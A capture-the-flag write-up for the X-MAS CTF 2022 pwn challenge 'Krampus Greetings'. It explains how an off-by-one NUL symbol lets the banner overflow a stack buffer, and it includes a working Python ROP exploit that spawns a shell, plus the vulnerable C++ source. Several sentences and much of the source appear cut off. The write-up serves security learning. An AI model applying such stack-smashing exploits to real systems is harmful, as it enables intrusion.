path: root/docs/writeups/X-MAS_CTF_2022/Krampus_Greetings.txt
blob: 8d3050906ef47ffdffa532176a5e9fed7bdb5b94 (plain) (tree)

Krampus wanted to redeem himself for all the bad he has done across the years.
He wrote you [a] small program to craft the best Christmas greetings.  He might
need to brush up his C++ skill though.

Category:       pwn (438 points)
Chall author:   tomadimitrie
Writeup author: malfurious

This challenge provides C++ source code for the vulnerable program (and a build
for reference).  See the original source attached below this writeup.  The clear
intent of the program is to take a string from the user and display it back to
them in a generated banner (lines containing a repeated character are added
above and below the echoed string).  However, the way the program goes about
calculating the length of these 'banner border lines' is interesting...

The program first asks for the single character to be repeated, then prompts for
a series of symbols (which come from a simple alphabet "ABCDEF").  The symbols
given by the user influence the total length of the border lines.  After doing
this calculation, another function is called (GenerateGreeting) which actually
renders the output in a stack buffer; this is where the string to be echoed is
collected as well.

The stack buffer that we build the output in is 2312 bytes in length (2336 bytes
from the stack frame base, according to r2).  Only 128 bytes are read for the
echoed string, so we need to get the calculated banner string length close to
this size, so that we can use the direct message read to place our custom return
address on the stack.

Pattern count algorithm
As mentioned earlier, a series of symbols determines the length of the repeated
character banner lines.  The logic dictating this is as follows:

    - each character from the SYMBOLS string ("ABCDEF") corresponds to a power
      of 3:

        A: 1
        B: 3
        C: 9
        D: 27

    - each character occurrence in the user input contributes that power to the
      total.  Put another way, the some of all like-symbols is the multiple of
      that power:

        AABBC -> 2(A) 2(B) 1(C) -> 2*1 + 2*3 + 9 -> length = 17

    - each symbol can appear no more than 3 times in the input

However, there is a problem.  Even if we give symbols for the largest possible
string according to these rules ("AAABBBCCCDDDEEEFFF") (the order doesn't
matter), we will only produce a banner of length 1092.  This banner is included
in the output twice, along with our echoed string which is a max of 128 bytes.
This is 2313 bytes exactly, the defined length of the output buffer in the C++

The trick is to utilize the implicit NULL-byte character that is placed at the
end of the SYMBOLS string constant used by the code (sizeof("ABCDEF") == 7)!
This would make any input NULL bytes equivalent to 3^6 or 729 under these rules,
allowing us to easily smash the stack.

You'll see a helper function in my exploit code that calculates a suitable
symbol sequence from a desired banner length.  In practice, the sequence I send


With a method for smashing the stack in hand, let's move on to crafting our
exploit.  The payload itself doesn't need to be too complicated, as the binary
gives us a convenient 'win' function to jump into (it's called "Flag", and just
calls system("/bin/sh")).

During experimentation, I found that the memory near the bottom of the stack
frame can't just be carelessly blown away.  Setting it all to 0x00 seems to
be ok, but using much higher valued bytes can lead to a crash.  This chunk of
stack memory is written by the banner generation, so I can't just use 0x00 as
the byte to be repeated (as scanf("%c") disallow this).  Instead I use another
arbitrary value as the repeated byte, but stop a little bit earlier at a
slightly smaller target banner length (in practice, the ideal length - 16).  I
then just pad up my stack smash payload (with zeroes) to account for this.

I pad out my write for the "symbol sequence" read with 0xff bytes, since 0x00
corresponds to a valid symbol input (and I can only have 3 of them).

The actual stack smash (a small ROP chain) requires a visit to one 'ret' gadget
to fixup stack alighment before returning to the Flag function, where we get a

Solution (Python/sploit)
#!/usr/bin/env sploit
from sploit.payload import *

def writefixed(data, size, pc):
    if len(data) > size:
        raise Exception("data too big for fixed write")
    gap = size-len(data)
    data += pc*gap

def getsymbols(n):
    chars = [ b'\x00', b'F', b'E', b'D', b'C', b'B', b'A' ]
    pows = [ pow(3, n) for n in reversed(range(len(chars))) ]
    res = b''

    for c, p in zip(chars, pows):
        x, n = divmod(n, p)
        res += c * x

    return res

flag    =  0x4011e7  # flag win function
ret     =  0x40131d  # ret gadget (stack alignment)
pad     = (0x7fffffffdfa0-0x7fffffffd680)-17 # Sub 1 for '\n', Sub 16 for (see below)

# It's important to keep the space near the base of the frame zero,
# or else things wont work.  However, we can't use \x00 for the scanf
# write below, so just stop the symbol banner early and pad out the
# smash payload a little bit.

symbols = getsymbols(pad)
smash   = Payload().rep(b'\x00', 16).sbp().ret(ret).ret(flag)

io.write(Payload.MAGIC)             # scanf %c
io.write(b'\n')                     # getchar
writefixed(symbols, 511, b'\xff')   # read(numberString)
writefixed(smash(), 128, b'\x00')   # read(&output[cursor])

Original source (C++)
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

void Setup() {
  setvbuf(stdin, NULL, _IONBF, 0);
  setvbuf(stdout, NULL, _IONBF, 0);
  setvbuf(stderr, NULL, _IONBF, 0);


__attribute__((used, hot, noinline))
void Flag() {

void GenerateGreeting(
  char patternSymbol,
  int patternCount
) {
  char output[2312] = { 0 };
  int outputCursor = 0;
  for (int i = 0; i < patternCount; i += 1) {
    output[outputCursor++] = patternSymbol;
  output[outputCursor++] = '\n';

  printf("enter greeting: \n");
  outputCursor += read(0, &output[outputCursor], 128);

  for (int i = 0; i < patternCount; i += 1) {
    output[outputCursor++] = patternSymbol;
  output[outputCursor++] = '\n';

  printf("%s\n", output);

int main() {

  printf("enter pattern character: \n");
  char patternSymbol;
  scanf("%c", &patternSymbol);

  printf("enter number of symbols: \n");
  char numberString[512];
  int readAmount = read(0, numberString, sizeof(numberString) - 1);
  numberString[readAmount] = '\0';

  int mappings[sizeof(SYMBOLS)] = { 0 };
  for (int i = 0; i < readAmount; i += 1) {
    char current = numberString[i];
    int index = 0;
    for (const auto symbol: SYMBOLS) {
      if (current == symbol) {
        mappings[index] += 1;
      index += 1;

  int patternCount = 0;
  int power = 1;
  for (int i = 0; i < sizeof(SYMBOLS); ++i) {
    if (mappings[i] > 3) {
    patternCount += power * mappings[i];
    power *= 3;

  GenerateGreeting(patternSymbol, patternCount);